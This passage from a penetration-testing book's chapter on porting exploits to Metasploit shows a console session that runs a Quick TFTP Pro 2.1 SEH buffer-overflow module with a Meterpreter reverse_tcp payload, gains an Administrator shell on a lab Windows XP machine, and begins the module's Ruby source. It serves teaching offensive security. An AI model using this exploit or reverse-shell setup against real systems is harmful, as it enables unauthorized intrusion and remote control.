Porting Exploits to the Metasploit Framework
231
Figure 15-6: Quick TFTP fully controlled
Next, we remove the dummy shellcode and run the module with a real
payload to get our shell, as shown here:
msf >
use exploit/windows/tftp/quicktftp_book
msf exploit(quicktftp_book) >
set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(quicktftp_book) >
set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(quicktftp_book) >
set RHOST 192.168.1.155
RHOST => 192.168.1.155
msf exploit(quicktftp_book) >
exploit
[*] Started reverse handler on 192.168.1.101:4444
[*] Trying target Windows XP SP2...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 2 opened (192.168.1.101:4444 -> 192.168.1.155:1036)
meterpreter >
getuid
Server username: V-XP-SP2-BARE\Administrator
Now that we have our Meterpreter shell, we’ve successfully ported an
exploit and used the Framework in an SEH exploit!
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Quick TFTP Pro 2.1 Long Mode Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Quick TFTP Pro 2.1.
},